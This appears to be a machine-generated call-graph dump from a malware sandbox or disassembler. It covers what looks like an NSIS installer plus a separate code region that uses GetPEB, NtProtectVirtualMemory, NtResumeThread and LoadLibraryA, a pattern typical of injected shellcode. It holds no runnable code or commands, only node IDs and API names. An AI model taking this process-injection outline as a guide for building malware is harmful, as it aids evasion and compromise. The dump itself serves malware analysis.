8465->8464 8466->8437 8467->8437 8468->8438 8470 4063b9 8469->8470 8471 4063c2 RegOpenKeyExW 8470->8471 8472 4063bd 8470->8472 8471->8472 8472->8464 8472->8465 8474 405e3f 8473->8474 8475 405e55 8474->8475 8476 405e46 CharNextW 8474->8476 8475->8455 8476->8474 8526 40653d lstrcpynW 8477->8526 8479 405f25 8527 405eb7 CharNextW CharNextW 8479->8527 8482 405c69 8482->8398 8482->8399 8483 4067c4 5 API calls 8489 405f3b 8483->8489 8484 405f6c lstrlenW 8485 405f77 8484->8485 8484->8489 8486 405e0c 3 API calls 8485->8486 8488 405f7c GetFileAttributesW 8486->8488 8487 406873 2 API calls 8487->8489 8488->8482 8489->8482 8489->8484 8489->8487 8490 405e58 2 API calls 8489->8490 8490->8484 8491->8403 8493 405e66 8492->8493 8494 405e78 8493->8494 8495 405e6c CharPrevW 8493->8495 8494->8407 8495->8493 8495->8494 8496->8433 8533 406008 GetFileAttributesW 8497->8533 8500 405c24 DeleteFileW 8502 405c2a 8500->8502 8501 405c1c RemoveDirectoryW 8501->8502 8503 405c2e 8502->8503 8504 405c3a SetFileAttributesW 8502->8504 8503->8433 8504->8503 8506 40565c 8505->8506 8508 4055ba 8505->8508 8506->8433 8507 4055d6 lstrlenW 8510 4055e4 lstrlenW 8507->8510 8511 4055ff 8507->8511 8508->8507 8509 40657a 17 API calls 8508->8509 8509->8507 8510->8506 8512 4055f6 lstrcatW 8510->8512 8513 405612 8511->8513 8514 405605 SetWindowTextW 8511->8514 8512->8511 8513->8506 8515 405618 SendMessageW SendMessageW SendMessageW 8513->8515 8514->8513 8515->8506 8517 406311 8516->8517 8519 40631e 8516->8519 8536 406183 8517->8536 8519->8433 8521 405dcd 8520->8521 8522 406889 FindClose 8520->8522 8521->8400 8521->8413 8522->8521 8524 405dd7 8523->8524 8525 405e28 lstrcatW 8523->8525 8524->8418 8525->8524 8526->8479 8528 405ed4 8527->8528 8529 405ee6 8527->8529 8528->8529 8530 405ee1 CharNextW 8528->8530 8531 405e39 CharNextW 8529->8531 8532 405f0a 8529->8532 8530->8532 8531->8529 8532->8482 8532->8483 8534 405c0d 8533->8534 8535 40601a SetFileAttributesW 8533->8535 8534->8500 8534->8501 8534->8503 8535->8534 8537 4061b3 8536->8537 8538 4061d9 GetShortPathNameW 8536->8538 8563 40602d GetFileAttributesW CreateFileW 8537->8563 8539 4062f8 8538->8539 8540 4061ee 8538->8540 8539->8519 8540->8539 8542 4061f6 wsprintfA 8540->8542 8544 40657a 17 API calls 8542->8544 8543 4061bd CloseHandle GetShortPathNameW 8543->8539 8545 4061d1 8543->8545 8546 40621e 8544->8546 8545->8538 8545->8539 8564 40602d GetFileAttributesW CreateFileW 8546->8564 8548 40622b 8548->8539 8549 40623a GetFileSize GlobalAlloc 8548->8549 8550 4062f1 CloseHandle 8549->8550 8551 40625c 8549->8551 8550->8539 8565 4060b0 ReadFile 8551->8565 8556 40627b lstrcpyA 8559 40629d 8556->8559 8557 40628f 8558 405f92 4 API calls 8557->8558 8558->8559 8560 4062d4 SetFilePointer 8559->8560 8572 4060df WriteFile 8560->8572 8563->8543 8564->8548 8566 4060ce 8565->8566 8566->8550 8567 405f92 lstrlenA 8566->8567 8568 405fd3 lstrlenA 8567->8568 8569 405fdb 8568->8569 8570 405fac lstrcmpiA 8568->8570 8569->8556 8569->8557 8570->8569 8571 405fca CharNextA 8570->8571 8571->8568 8573 4060fd GlobalFree 8572->8573 8573->8550 9961 6fe010e1 9971 6fe01111 9961->9971 9962 6fe012b0 GlobalFree 9963 6fe01240 GlobalFree 9963->9971 9964 6fe011d7 GlobalAlloc 9964->9971 9965 6fe012ab 9965->9962 9966 6fe0135a 2 API calls 9966->9971 9967 6fe01312 2 API calls 9967->9971 9968 6fe0129a GlobalFree 9968->9971 9969 6fe01381 lstrcpyW 9969->9971 9970 6fe0116b GlobalAlloc 9970->9971 9971->9962 9971->9963 9971->9964 9971->9965 9971->9966 9971->9967 9971->9968 9971->9969 9971->9970 9599 401c43 9600 402d84 17 API calls 9599->9600 9601 401c4a 9600->9601 9602 402d84 17 API calls 9601->9602 9603 401c57 9602->9603 9604 401c6c 9603->9604 9605 402da6 17 API calls 9603->9605 9606 401c7c 9604->9606 9607 402da6 17 API calls 9604->9607 9605->9604 9608 401cd3 9606->9608 9609 401c87 9606->9609 9607->9606 9610 402da6 17 API calls 9608->9610 9611 402d84 17 API calls 9609->9611 9612 401cd8 9610->9612 9613 401c8c 9611->9613 9614 402da6 17 API calls 9612->9614 9615 402d84 17 API calls 9613->9615 9617 401ce1 FindWindowExW 9614->9617 9616 401c98 9615->9616 9618 401cc3 SendMessageW 9616->9618 9619 401ca5 SendMessageTimeoutW 9616->9619 9620 401d03 9617->9620 9618->9620 9619->9620 9972 404943 9973 404953 9972->9973 9974 404979 9972->9974 9975 404499 18 API calls 9973->9975 9976 404500 8 API calls 9974->9976 9978 404960 SetDlgItemTextW 9975->9978 9977 404985 9976->9977 9978->9974 9621 6fe023e9 9622 6fe02453 9621->9622 9623 6fe0245e GlobalAlloc 9622->9623 9624 6fe0247d 9622->9624 9623->9622 9625 2a450ae 9627 2a450b3 9625->9627 9626 2a54945 9 API calls 9628 2a4513c 9626->9628 9627->9626 9627->9628 9629 401e4e GetDC 9630 402d84 17 API calls 9629->9630 9631 401e60 GetDeviceCaps MulDiv ReleaseDC 9630->9631 9632 402d84 17 API calls 9631->9632 9633 401e91 9632->9633 9634 40657a 17 API calls 9633->9634 9635 401ece CreateFontIndirectW 9634->9635 9636 402638 9635->9636 9979 402950 9980 402da6 17 API calls 9979->9980 9982 40295c 9980->9982 9981 402972 9984 406008 2 API calls 9981->9984 9982->9981 9983 402da6 17 API calls 9982->9983 9983->9981 9985 402978 9984->9985 10007 40602d GetFileAttributesW CreateFileW 9985->10007 9987 402985 9988 402a3b 9987->9988 9989 4029a0 GlobalAlloc 9987->9989 9990 402a23 9987->9990 9991 402a42 DeleteFileW 9988->9991 9992 402a55 9988->9992 9989->9990 9993 4029b9 9989->9993 9994 4032b4 31 API calls 9990->9994 9991->9992 10008 4034e5 SetFilePointer 9993->10008 9996 402a30 CloseHandle 9994->9996 9996->9988 9997 4029bf 9998 4034cf ReadFile 9997->9998 9999 4029c8 GlobalAlloc 9998->9999 10000 4029d8 9999->10000 10001 402a0c 9999->10001 10002 4032b4 31 API calls 10000->10002 10003 4060df WriteFile 10001->10003 10006 4029e5 10002->10006 10004 402a18 GlobalFree 10003->10004 10004->9990 10005 402a03 GlobalFree 10005->10001 10006->10005 10007->9987 10008->9997 10009 401956 10010 402da6 17 API calls 10009->10010 10011 40195d lstrlenW 10010->10011 10012 402638 10011->10012 9637 404658 9638 404670 9637->9638 9642 40478a 9637->9642 9643 404499 18 API calls 9638->9643 9639 4047f4 9640 4048be 9639->9640 9641 4047fe GetDlgItem 9639->9641 9648 404500 8 API calls 9640->9648 9644 404818 9641->9644 9645 40487f 9641->9645 9642->9639 9642->9640 9646 4047c5 GetDlgItem SendMessageW 9642->9646 9647 4046d7 9643->9647 9644->9645 9652 40483e SendMessageW LoadCursorW SetCursor 9644->9652 9645->9640 9649 404891 9645->9649 9670 4044bb KiUserCallbackDispatcher 9646->9670 9651 404499 18 API calls 9647->9651 9659 4048b9 9648->9659 9653 4048a7 9649->9653 9654 404897 SendMessageW 9649->9654 9656 4046e4 CheckDlgButton 9651->9656 9674 404907 9652->9674 9653->9659 9660 4048ad SendMessageW 9653->9660 9654->9653 9655 4047ef 9671 4048e3 9655->9671 9668 4044bb KiUserCallbackDispatcher 9656->9668 9660->9659 9663 404702 GetDlgItem 9669 4044ce SendMessageW 9663->9669 9665 404718 SendMessageW 9666 404735 GetSysColor 9665->9666 9667 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 9665->9667 9666->9667 9667->9659 9668->9663 9669->9665 9670->9655 9672 4048f1 9671->9672 9673 4048f6 SendMessageW 9671->9673 9672->9673 9673->9639 9677 405b63 ShellExecuteExW 9674->9677 9676 40486d LoadCursorW SetCursor 9676->9645 9677->9676 10013 402b59 10014 402b60 10013->10014 10015 402bab 10013->10015 10018 402d84 17 API calls 10014->10018 10021 402ba9 10014->10021 10016 40690a 5 API calls 10015->10016 10017 402bb2 10016->10017 10019 402da6 17 API calls 10017->10019 10020 402b6e 10018->10020 10022 402bbb 10019->10022 10023 402d84 17 API calls 10020->10023 10022->10021 10024 402bbf IIDFromString 10022->10024 10026 402b7a 10023->10026 10024->10021 10025 402bce 10024->10025 10025->10021 10031 40653d lstrcpynW 10025->10031 10030 406484 wsprintfW 10026->10030 10028 402beb CoTaskMemFree 10028->10021 10030->10021 10031->10028 9028 40175c 9029 402da6 17 API calls 9028->9029 9030 401763 9029->9030 9034 40605c 9030->9034 9032 40176a 9033 40605c 2 API calls 9032->9033 9033->9032 9035 406069 GetTickCount GetTempFileNameW 9034->9035 9036 4060a3 9035->9036 9037 40609f 9035->9037 9036->9032 9037->9035 9037->9036 10032 401d5d 10033 402d84 17 API calls 10032->10033 10034 401d6e SetWindowLongW 10033->10034 10035 402c2a 10034->10035 9120 405b63 ShellExecuteExW 10036 401563 10037 402ba4 10036->10037 10040 406484 wsprintfW 10037->10040 10039 402ba9 10040->10039 10041 2a51386 10042 2a51377 10041->10042 10042->10041 10043 2a5590a LoadLibraryA 10042->10043 10045 2a56045 2 API calls 10042->10045 10046 2a4dd8e 10042->10046 10044 2a5591b 10043->10044 10047 2a558f2 10045->10047 10047->10043 10048 2a46b80 10049 2a46b89 10048->10049 10050 2a46ee4 10049->10050 10051 2a495a8 5 API calls 10049->10051 10052 2a47095 10051->10052 9678 2a46c83 9679 2a46c6b 9678->9679 9679->9679 9680 2a46ee4 9679->9680 9683 2a495a8 9679->9683 9682 2a47095 9684 2a495c4 9683->9684 9686 2a49ca5 9683->9686 9701 2a591d8 9684->9701 9686->9682 9687 2a5590a LoadLibraryA 9686->9687 9689 2a56045 2 API calls 9686->9689 9691 2a4d130 9686->9691 9688 2a5591b 9687->9688 9688->9682 9690 2a558f2 9689->9690 9690->9687 9691->9682 9702 2a591dd NtResumeThread 9701->9702 10053 401968 10054 402d84 17 API calls 10053->10054 10055 40196f 10054->10055 10056 402d84 17 API calls 10055->10056 10057 40197c 10056->10057 10058 402da6 17 API calls 10057->10058 10059 401993 lstrlenW 10058->10059 10061 4019a4 10059->10061 10060 4019e5 10061->10060 10065 40653d lstrcpynW 10061->10065 10063 4019d5 10063->10060 10064 4019da lstrlenW 10063->10064 10064->10060 10065->10063 9703 40166a 9704 402da6 17 API calls 9703->9704 9705 401670 9704->9705 9706 406873 2 API calls 9705->9706 9707 401676 9706->9707 9177 2a45089 9178 2a45092 9177->9178 9180 2a4513c 9178->9180 9181 2a54945 9178->9181 9185 2a5489f 9181->9185 9182 2a548e1 9182->9180 9209 2a54c6c 9182->9209 9183 2a54c6c CreateFileA 9188 2a54af7 9183->9188 9184 2a549a6 9184->9182 9189 2a54ad7 9184->9189 9185->9181 9185->9182 9185->9184 9187 2a54ac6 9185->9187 9185->9188 9185->9189 9187->9182 9197 2a54b22 9187->9197 9198 2a54c69 9188->9198 9212 2a54b96 9188->9212 9189->9183 9192 2a573fd 9193 2a54e18 9194 2a54db4 CreateFileA 9193->9194 9199 2a54e1b 9193->9199 9194->9180 9195 2a54b93 9196 2a54c6c CreateFileA 9195->9196 9201 2a54bdd 9196->9201 9197->9188 9197->9195 9198->9180 9218 2a57403 9198->9218 9200 2a54ff7 9199->9200 9199->9201 9202 2a54f75 9199->9202 9200->9180 9201->9198 9201->9200 9203 2a55874 9202->9203 9204 2a5590a LoadLibraryA 9202->9204 9207 2a4dd8e 9202->9207 9206 2a56045 2 API calls 9203->9206 9205 2a5591b 9204->9205 9205->9180 9208 2a558f2 9206->9208 9207->9180 9208->9204 9210 2a54cdf CreateFileA 9209->9210 9210->9188 9213 2a54bc5 9212->9213 9214 2a54c6c CreateFileA 9213->9214 9215 2a54bdd 9214->9215 9215->9193 9216 2a57403 6 API calls 9215->9216 9217 2a573fd 9216->9217 9220 2a57407 9218->9220 9219 2a4d130 9219->9192 9220->9219 9221 2a5787d GetPEB 9220->9221 9222 2a578c5 9221->9222 9243 2a58ad4 9222->9243 9224 2a579ef 9224->9219 9225 2a58397 9224->9225 9238 2a57e09 9224->9238 9228 2a58857 9225->9228 9229 2a584a5 9225->9229 9226 2a58ad4 NtProtectVirtualMemory 9227 2a58acf 9226->9227 9227->9192 9228->9226 9234 2a59d00 9228->9234 9231 2a58ad4 NtProtectVirtualMemory 9229->9231 9230 2a4cb44 GetPEB 9242 2a440aa 9230->9242 9232 2a58852 9231->9232 9232->9192 9233 2a582c1 9233->9219 9235 2a58ad4 NtProtectVirtualMemory 9233->9235 9234->9192 9235->9219 9236 2a55744 9236->9219 9237 2a5590a LoadLibraryA 9236->9237 9240 2a56045 2 API calls 9236->9240 9239 2a5591b 9237->9239 9238->9233 9238->9236 9238->9242 9239->9192 9241 2a558f2 9240->9241 9241->9237 9242->9219 9242->9230 9242->9236 9242->9242 9244 2a58b57 NtProtectVirtualMemory 9243->9244 9244->9224 9483 40176f 9484 402da6 17 API calls 9483->9484 9485 401776 9484->9485 9486 401796 9485->9486 9487 40179e 9485->9487 9522 40653d lstrcpynW 9486->9522 9523 40653d lstrcpynW 9487->9523 9490 40179c 9494 4067c4 5 API calls 9490->9494 9491 4017a9 9492 405e0c 3 API calls 9491->9492 9493 4017af lstrcatW 9492->9493 9493->9490 9511 4017bb 9494->9511 9495 406873 2 API calls 9495->9511 9496 406008 2 API calls 9496->9511 9498 4017cd CompareFileTime 9498->9511 9499 40188d 9500 40559f 24 API calls 9499->9500 9503 401897 9500->9503 9501 40559f 24 API calls 9510 401879 9501->9510 9502 40653d lstrcpynW 9502->9511 9504 4032b4 31 API calls 9503->9504 9505 4018aa 9504->9505 9506 4018be SetFileTime 9505->9506 9507 4018d0 CloseHandle 9505->9507 9506->9507 9509 4018e1 9507->9509 9507->9510 9508 40657a 17 API calls 9508->9511 9512 4018e6 9509->9512 9513 4018f9 9509->9513 9511->9495 9511->9496 9511->9498 9511->9499 9511->9502 9511->9508 9517 405b9d MessageBoxIndirectW 9511->9517 9519 401864 9511->9519 9521 40602d GetFileAttributesW CreateFileW 9511->9521 9514 40657a 17 API calls 9512->9514 9515 40657a 17 API calls 9513->9515 9516 4018ee lstrcatW 9514->9516 9518 401901 9515->9518 9516->9518 9517->9511 9518->9510 9520 405b9d MessageBoxIndirectW 9518->9520 9519->9501 9519->9510 9520->9510 9521->9511 9522->9490 9523->9491 9717 401a72 9718 402d84 17 API calls 9717->9718 9719 401a7b 9718->9719 9720 402d84 17 API calls 9719->9720 9721 401a20 9720->9721 9537 401573 9538 401583 ShowWindow 9537->9538 9539 40158c 9537->9539 9538->9539 9540 402c2a 9539->9540 9541 40159a ShowWindow 9539->9541 9541->9540 9722 2a45292 9725 2a45298 9722->9725 9723 2a57403 6 API calls 9724 2a573fd 9723->9724 9725->9723 9726 2a45342 9725->9726 10066 401b77 10067 402da6 17 API calls 10066->10067 10068 401b7e 10067->10068 10069 402d84 17 API calls 10068->10069 10070 401b87 wsprintfW 10069->10070 10071 402c2a 10070->10071 9727 40167b 9728 402da6 17 API calls 9727->9728 9729 401682 9728->9729 9730 402da6 17 API calls 9729->9730 9731 40168b 9730->9731 9732 402da6 17 API calls 9731->9732 9733 401694 MoveFileW 9732->9733 9734 4016a0 9733->9734 9735 4016a7 9733->9735 9736 401423 24 API calls 9734->9736 9737 406873 2 API calls 9735->9737 9739 4022f6 9735->9739 9736->9739 9738 4016b6 9737->9738 9738->9739 9740 4062fd 36 API calls 9738->9740 9740->9734 9741 401000 9742 401037 BeginPaint GetClientRect 9741->9742 9743 40100c DefWindowProcW 9741->9743 9745 4010f3 9742->9745 9746 401179 9743->9746 9747 401073 CreateBrushIndirect FillRect DeleteObject 9745->9747 9748 4010fc 9745->9748 9747->9745 9749 401102 CreateFontIndirectW 9748->9749 9750 401167 EndPaint 9748->9750 9749->9750 9751 401112 6 API calls 9749->9751 9750->9746 9751->9750 10072 401503 10073 40150b 10072->10073 10075 40151e 10072->10075 10074 402d84 17 API calls 10073->10074 10074->10075 9752 2a480e0 9755 2a480eb 9752->9755 9753 2a591d8 NtResumeThread 9754 2a48193 9753->9754 9756 2a591d8 NtResumeThread 9754->9756 9755->9753 9757 2a481ac 9756->9757 9758 402c05 SendMessageW 9759 402c2a 9758->9759 9760 402c1f InvalidateRect 9758->9760 9760->9759 10076 404f06 GetDlgItem GetDlgItem 10077 404f58 7 API calls 10076->10077 10083 40517d 10076->10083 10078 404ff2 SendMessageW 10077->10078 10079 404fff DeleteObject 10077->10079 10078->10079 10080 405008 10079->10080 10082 40503f 10080->10082 10084 40657a 17 API calls 10080->10084 10081 40525f 10086 40530b 10081->10086 10096 4052b8 SendMessageW 10081->10096 10119 405170 10081->10119 10085 404499 18 API calls 10082->10085 10083->10081 10087 4051ec 10083->10087 10130 404e54 SendMessageW 10083->10130 10090 405021 SendMessageW SendMessageW 10084->10090 10091 405053 10085->10091 10088 405315 SendMessageW 10086->10088 10089 40531d 10086->10089 10087->10081 10092 405251 SendMessageW 10087->10092 10088->10089 10098 405336 10089->10098 10099 40532f ImageList_Destroy 10089->10099 10111 405346 10089->10111 10090->10080 10095 404499 18 API calls 10091->10095 10092->10081 10093 404500 8 API calls 10097 40550c 10093->10097 10100 405064 10095->10100 10102 4052cd SendMessageW 10096->10102 10096->10119 10103 40533f GlobalFree 10098->10103 10098->10111 10099->10098 10104 40513f GetWindowLongW SetWindowLongW 10100->10104 10110 4050b7 SendMessageW 10100->10110 10113 40513a 10100->10113 10116 4050f5 SendMessageW 10100->10116 10117 405109 SendMessageW 10100->10117 10101 4054c0 10106 4054d2 ShowWindow GetDlgItem ShowWindow 10101->10106 10101->10119 10105 4052e0 10102->10105 10103->10111 10107 405158 10104->10107 10112 4052f1 SendMessageW 10105->10112 10106->10119 10108 405175 10107->10108 10109 40515d ShowWindow 10107->10109 10129 4044ce SendMessageW 10108->10129 10128 4044ce SendMessageW 10109->10128 10110->10100 10111->10101 10123 405381 10111->10123 10135 404ed4 10111->10135 10112->10086 10113->10104 10113->10107 10116->10100 10117->10100 10119->10093 10120 40548b 10121 405496 InvalidateRect 10120->10121 10124 4054a2 10120->10124 10121->10124 10122 4053af SendMessageW 10127 4053c5 10122->10127 10123->10122 10123->10127 10124->10101 10144 404e0f 10124->10144 10126 405439 SendMessageW SendMessageW 10126->10127 10127->10120 10127->10126 10128->10119 10129->10083 10131 404eb3 SendMessageW 10130->10131 10132 404e77 GetMessagePos ScreenToClient SendMessageW 10130->10132 10134 404eab 10131->10134 10133 404eb0 10132->10133 10132->10134 10133->10131 10134->10087 10147 40653d lstrcpynW 10135->10147 10137 404ee7 10148 406484 wsprintfW 10137->10148 10139 404ef1 10140 40140b 2 API calls 10139->10140 10141 404efa 10140->10141 10149 40653d lstrcpynW 10141->10149 10143 404f01 10143->10123 10150 404d46 10144->10150 10146 404e24 10146->10101 10147->10137 10148->10139 10149->10143 10151 404d5f 10150->10151 10152 40657a 17 API calls 10151->10152 10153 404dc3 10152->10153 10154 40657a 17 API calls 10153->10154 10155 404dce 10154->10155 10156 40657a 17 API calls 10155->10156 10157 404de4 lstrlenW wsprintfW SetDlgItemTextW 10156->10157 10157->10146 10158 2a42de2 10164 2a42dc7 10158->10164 10159 2a4cb44 GetPEB 10159->10164 10160 2a5590a LoadLibraryA 10161 2a5591b 10160->10161 10162 2a56045 2 API calls 10163 2a558f2 10162->10163 10163->10160 10164->10158 10164->10159 10164->10164 10165 2a42e27 10164->10165 10166 2a4d130 10164->10166 10165->10160 10165->10162 10165->10166 9761 404609 lstrlenW 9762 404628 9761->9762 9763 40462a WideCharToMultiByte 9761->9763 9762->9763 10167 40290b 10168 402da6 17 API calls 10167->10168 10169 402912 FindFirstFileW 10168->10169 10170 40293a 10169->10170 10174 402925 10169->10174 10171 402943 10170->10171 10175 406484 wsprintfW 10170->10175 10176 40653d lstrcpynW 10171->10176 10175->10171 10176->10174 10177 40190c 10178 401943 10177->10178 10179 402da6 17 API calls 10178->10179 10180 401948 10179->10180 10181 405c49 67 API calls 10180->10181 10182 401951 10181->10182 10183 40190f 10184 402da6 17 API calls 10183->10184 10185 401916 10184->10185 10186 405b9d MessageBoxIndirectW 10185->10186 10187 40191f 10186->10187 10188 401f12 10189 402da6 17 API calls 10188->10189 10190 401f18 10189->10190 10191 402da6 17 API calls 10190->10191 10192 401f21 10191->10192 10193 402da6 17 API calls 10192->10193 10194 401f2a 10193->10194 10195 402da6 17 API calls 10194->10195 10196 401f33 10195->10196 10197 401423 24 API calls 10196->10197 10198 401f3a 10197->10198 10205 405b63 ShellExecuteExW 10198->10205 10200 401f82 10203 40292e 10200->10203 10206 4069b5 WaitForSingleObject 10200->10206 10202 401f9f CloseHandle 10202->10203 10205->10200 10207 4069cf 10206->10207 10208 4069e1 GetExitCodeProcess 10207->10208 10209 406946 2 API calls 10207->10209 10208->10202 10210 4069d6 WaitForSingleObject 10209->10210 10210->10207 10211 405513 10212 405523 10211->10212 10213 405537 10211->10213 10214 405529 10212->10214 10223 405580 10212->10223 10215 40553f IsWindowVisible 10213->10215 10221 405556 10213->10221 10217 4044e5 SendMessageW 10214->10217 10218 40554c 10215->10218 10215->10223 10216 405585 CallWindowProcW 10219 405533 10216->10219 10217->10219 10220 404e54 5 API calls 10218->10220 10220->10221 10221->10216 10222 404ed4 4 API calls 10221->10222 10222->10223 10223->10216 10224 401d17 10225 402d84 17 API calls 10224->10225 10226 401d1d IsWindow 10225->10226 10227 401a20 10226->10227 9764 40261c 9765 402da6 17 API calls 9764->9765 9766 402623 9765->9766 9769 40602d GetFileAttributesW CreateFileW 9766->9769 9768 40262f 9769->9768 9770 2a44afb 9774 2a55b01 9770->9774 9772 2a44bbf 9773 2a44acf 9773->9770 9773->9772 9777 2a55744 9774->9777 9775 2a5590a LoadLibraryA 9776 2a5591b 9775->9776 9776->9773 9777->9775 9778 2a56045 2 API calls 9777->9778 9779 2a4dd8e 9777->9779 9780 2a558f2 9778->9780 9779->9773 9780->9775 9125 40252a 9126 402de6 17 API calls 9125->9126 9127 402534 9126->9127 9128 402da6 17 API calls 9127->9128 9129 40253d 9128->9129 9130 402548 RegQueryValueExW 9129->9130 9133 40292e 9129->9133 9131 402568 9130->9131 9132 40256e RegCloseKey 9130->9132 9131->9132 9136 406484 wsprintfW 9131->9136 9132->9133 9136->9132 9781 40202a 9782 402da6 17 API calls 9781->9782 9783 402031 9782->9783 9784 40690a 5 API calls 9783->9784 9785 402040 9784->9785 9786 40205c GlobalAlloc 9785->9786 9788 4020cc 9785->9788 9787 402070 9786->9787 9786->9788 9789 40690a 5 API calls 9787->9789 9790 402077 9789->9790 9791 40690a 5 API calls 9790->9791 9792 402081 9791->9792 9792->9788 9796 406484 wsprintfW 9792->9796 9794 4020ba 9797 406484 wsprintfW 9794->9797 9796->9794 9797->9788 9246 40352d SetErrorMode GetVersionExW 9247 4035b7 9246->9247 9248 40357f GetVersionExW 9246->9248 9249 403610 9247->9249 9250 40690a 5 API calls 9247->9250 9248->9247 9251 40689a 3 API calls 9249->9251 9250->9249 9252 403626 lstrlenA 9251->9252 9252->9249 9253 403636 9252->9253 9254 40690a 5 API calls 9253->9254 9255 40363d 9254->9255 9256 40690a 5 API calls 9255->9256 9257 403644 9256->9257 9258 40690a 5 API calls 9257->9258 9259 403650 #17 OleInitialize SHGetFileInfoW 9258->9259 9337 40653d lstrcpynW 9259->9337 9262 40369d GetCommandLineW 9338 40653d lstrcpynW 9262->9338 9264 4036af 9265 405e39 CharNextW 9264->9265 9266 4036d5 CharNextW 9265->9266 9274 4036e6 9266->9274 9267 4037e4 9268 4037f8 GetTempPathW 9267->9268 9339 4034fc 9268->9339 9270 403810 9271 403814 GetWindowsDirectoryW lstrcatW 9270->9271 9272 40386a DeleteFileW 9270->9272 9275 4034fc 12 API calls 9271->9275 9349 40307d GetTickCount GetModuleFileNameW 9272->9349 9273 405e39 CharNextW 9273->9274 9274->9267 9274->9273 9280 4037e6 9274->9280 9277 403830 9275->9277 9277->9272 9279 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 9277->9279 9278 40387d 9281 403941 9278->9281 9285 403932 9278->9285 9286 405e39 CharNextW 9278->9286 9284 4034fc 12 API calls 9279->9284 9433 40653d lstrcpynW 9280->9433 9441 403b12 9281->9441 9289 403862 9284->9289 9377 403bec 9285->9377 9301 40389f 9286->9301 9289->9272 9289->9281 9290 403a69 9292 405b9d MessageBoxIndirectW 9290->9292 9291 403a7e 9293 403a86 GetCurrentProcess OpenProcessToken 9291->9293 9294 403afc ExitProcess 9291->9294 9298 403a76 ExitProcess 9292->9298 9299 403acc 9293->9299 9300 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 9293->9300 9296 403908 9303 405f14 18 API calls 9296->9303 9297 403949 9302 405b08 5 API calls 9297->9302 9304 40690a 5 API calls 9299->9304 9300->9299 9301->9296 9301->9297 9305 40394e lstrcatW 9302->9305 9306 403914 9303->9306 9307 403ad3 9304->9307 9309 40396a lstrcatW lstrcmpiW 9305->9309 9310 40395f lstrcatW 9305->9310 9306->9281 9434 40653d lstrcpynW 9306->9434 9308 403ae8 ExitWindowsEx 9307->9308 9311 403af5 9307->9311 9308->9294 9308->9311 9309->9281 9312 40398a 9309->9312 9310->9309 9314 40140b 2 API calls 9311->9314 9315 403996 9312->9315 9316 40398f 9312->9316 9314->9294 9319 405aeb 2 API calls 9315->9319 9318 405a6e 4 API calls 9316->9318 9317 403927 9435 40653d lstrcpynW 9317->9435 9321 403994 9318->9321 9322 40399b SetCurrentDirectoryW 9319->9322 9321->9322 9323 4039b8 9322->9323 9324 4039ad 9322->9324 9437 40653d lstrcpynW 9323->9437 9436 40653d lstrcpynW 9324->9436 9327 40657a 17 API calls 9328 4039fa DeleteFileW 9327->9328 9329 403a06 CopyFileW 9328->9329 9334 4039c5 9328->9334 9329->9334 9330 403a50 9331 4062fd 36 API calls 9330->9331 9331->9281 9332 4062fd 36 API calls 9332->9334 9333 40657a 17 API calls 9333->9334 9334->9327 9334->9330 9334->9332 9334->9333 9336 403a3a CloseHandle 9334->9336 9438 405b20 CreateProcessW 9334->9438 9336->9334 9337->9262 9338->9264 9340 4067c4 5 API calls 9339->9340 9342 403508 9340->9342 9341 403512 9341->9270 9342->9341 9343 405e0c 3 API calls 9342->9343 9344 40351a 9343->9344 9345 405aeb 2 API calls 9344->9345 9346 403520 9345->9346 9347 40605c 2 API calls 9346->9347 9348 40352b 9347->9348 9348->9270 9448 40602d GetFileAttributesW CreateFileW 9349->9448 9351 4030bd 9370 4030cd 9351->9370 9449 40653d lstrcpynW 9351->9449 9353 4030e3 9354 405e58 2 API calls 9353->9354 9355 4030e9 9354->9355 9450 40653d lstrcpynW 9355->9450 9357 4030f4 GetFileSize 9358 4031ee 9357->9358 9376 40310b 9357->9376 9451 403019 9358->9451 9360 4031f7 9362 403227 GlobalAlloc 9360->9362 9360->9370 9463 4034e5 SetFilePointer 9360->9463 9361 4034cf ReadFile 9361->9376 9462 4034e5 SetFilePointer 9362->9462 9363 40325a 9367 403019 6 API calls 9363->9367 9366 403242 9369 4032b4 31 API calls 9366->9369 9367->9370 9368 403210 9371 4034cf ReadFile 9368->9371 9374 40324e 9369->9374 9370->9278 9373 40321b 9371->9373 9372 403019 6 API calls 9372->9376 9373->9362 9373->9370 9374->9370 9374->9374 9375 40328b SetFilePointer 9374->9375 9375->9370 9376->9358 9376->9361 9376->9363 9376->9370 9376->9372 9378 40690a 5 API calls 9377->9378 9379 403c00 9378->9379 9380 403c06 9379->9380 9381 403c18 9379->9381 9476 406484 wsprintfW 9380->9476 9382 40640b 3 API calls 9381->9382 9383 403c48 9382->9383 9384 403c67 lstrcatW 9383->9384 9386 40640b 3 API calls 9383->9386 9387 403c16 9384->9387 9386->9384 9468 403ec2 9387->9468 9390 405f14 18 API calls 9391 403c99 9390->9391 9392 403d2d 9391->9392 9394 40640b 3 API calls 9391->9394 9393 405f14 18 API calls 9392->9393 9395 403d33 9393->9395 9396 403ccb 9394->9396 9397 403d43 LoadImageW 9395->9397 9398 40657a 17 API calls 9395->9398 9396->9392 9404 403cec lstrlenW 9396->9404 9405 405e39 CharNextW 9396->9405 9399 403de9 9397->9399 9400 403d6a RegisterClassW 9397->9400 9398->9397 9403 40140b 2 API calls 9399->9403 9401 403da0 SystemParametersInfoW CreateWindowExW 9400->9401 9402 403df3 9400->9402 9401->9399 9402->9281 9408 403def 9403->9408 9406 403d20 9404->9406 9407 403cfa lstrcmpiW 9404->9407 9409 403ce9 9405->9409 9411 405e0c 3 API calls 9406->9411 9407->9406 9410 403d0a GetFileAttributesW 9407->9410 9408->9402 9413 403ec2 18 API calls 9408->9413 9409->9404 9412 403d16 9410->9412 9414 403d26 9411->9414 9412->9406 9415 405e58 2 API calls 9412->9415 9416 403e00 9413->9416 9477 40653d lstrcpynW 9414->9477 9415->9406 9418 403e0c ShowWindow 9416->9418 9419 403e8f 9416->9419 9421 40689a 3 API calls 9418->9421 9420 405672 5 API calls 9419->9420 9422 403e95 9420->9422 9423 403e24 9421->9423 9424 403eb1 9422->9424 9428 403e99 9422->9428 9425 403e32 GetClassInfoW 9423->9425 9430 40689a 3 API calls 9423->9430 9429 40140b 2 API calls 9424->9429 9426 403e46 GetClassInfoW RegisterClassW 9425->9426 9427 403e5c DialogBoxParamW 9425->9427 9426->9427 9431 40140b 2 API calls 9427->9431 9428->9402 9432 40140b 2 API calls 9428->9432 9429->9402 9430->9425 9431->9402 9432->9402 9433->9268 9434->9317 9435->9285 